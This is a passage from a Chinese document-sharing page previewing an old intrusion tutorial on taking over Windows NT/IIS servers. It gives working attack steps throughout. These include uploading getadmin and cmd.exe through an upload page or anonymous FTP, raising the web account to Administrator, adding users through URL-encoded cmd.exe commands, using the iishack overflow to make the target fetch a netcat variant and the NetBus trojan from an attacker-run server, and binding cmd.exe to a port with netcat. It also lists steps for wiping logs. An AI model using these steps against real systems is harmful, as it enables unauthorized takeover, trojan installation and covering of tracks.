入侵NTserver典型途径攻击基础_第1页
入侵NTserver典型途径攻击基础_第2页
入侵NTserver典型途径攻击基础_第3页
入侵NTserver典型途径攻击基础_第4页
入侵NTserver典型途径攻击基础_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第第页入侵NTserver典型途径攻击基础入侵NTserver典型途径攻击基础

发表于:2023-05-25来源::点击数:标签:入侵NTserver典型攻击途径

1.如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限;2.用netcat和iishack可以获得Administrator;3.iusr_计算机名这个帐号有ftp上传、web执行等权限;4.在webserver上执行程序是入侵NT的关键;5.要在webser

1.如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限;

2.用netcat和iishack可以获得Administrator;

3.iusr_计算机名这个帐号有ftp上传、(web)执行等权限;

4.在webserver上执行程序是入侵NT的关键;

5.要在webserver上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。

在本文中,目标机器的名称是ntsvr2,目标机器的域名是,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:

/scripts/uploadn.asp

guest和iusr_ntsvr2这两个帐号都可以进这个asp页面。

在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录,然后输入:

/scripts/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGIError

这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以adduser:

/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

/scripts/getadmin.exe?china

第二个方法:用匿名ftp

如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NTserver的机会。我们用ftp登陆一个NT

server,比如:(示例名):

c:\ftp

Connectedto

220ntsvr2MicrosoftFTPService(Version3.0).

ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain

user组,这个帐号我们以后要用来获取Administrator的权限。

User(:(none)):anonymous

331Anonymousaclearcase/"target="_blank">ccessallowed,sendidentity(e-mailname)aspassword.

Password:输入guest@或者guest

对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码,那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain

guest组,在这种情况下我们就可以进NTserver的ftp了。

进去以后,看看目录列表,试试cd/scripts或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握了。

把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:

/cgi-bin/getadmin.exe?IUSR_ntsvr2

大约十多秒后屏幕显示:

CGIError

这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。

下面可以adduser:

/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

这样就创建了一个叫china用户,密码是news,然后:

/cgi-bin/getadmin.exe?china

或者

/scripts/tools/getadmin.exe?china

你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改。如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录下。

第三个方法:用netcat和iishack

如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。

IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序:iishack.exe、ncx99.exe,为达目的你必须自己有一个webserver,把ncx99.exe和netbus木马传到这个web

server的目录下,比如你的webserver是,而对方的IISserver是,则:

iishack80/ncx99.exe(注意:不要加“http://”字符!)

上述命令输入后这时你应该可以看到:

(IIS4.0remotebufferoverflowexploit)

(c)darkspyrit--barns@.

http://www.eE

[usage:iishack〈host〉〈port〉〈url〉]

eg-iishack80/thetrojan.exe

donotincludehttp://'beforehosts!

Datasent!

然后:再把Netbus等特洛伊木马传到对方机器上去:

iishack80/netbus.exe

ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务,ncx.exe这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用,所以可能不一定有效。然后,用Telnet到对方的99或80端口:

Telnet99

结果是这样:

Microsoft(R)(Windows)NT(TM)

(C)Copyright1985-1996MicrosoftCorp.

C:\[Youhavefullaccesstothesystem,happybrowsing:)]

C:\[AddascheduledtasktorestartinetinfoinXminutes]

C:\[Addascheduledtasktodeletencx.exeinX-1minutes]

C:\[Cleanupanytraceorlogswemighthaveleftbehind.]

这样,你就完全控制了其硬盘上的文件!注意,如果你typeexit退出,对方server上的这个进程也会退出。

参考(资料):eeye.zip

补救方法:在IIS的wwwservice属性中将主目录的应用程序设置的*.htr的映射删除。

第四个方法:如果你具有一个目录的上传权限,且这个目录具有执行的许可,那么恭喜你,你可以Telnet到这台server了!

下面是具体步骤:

假设你的目录是/frankie,那么,把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,然后在浏览器端输入:

/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe

这时候你的浏览器将停止不动,实际上server上的Telnet的服务已经产生了。

这时,用Telnet连接的23端口,你发现会不用密码、不用登

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论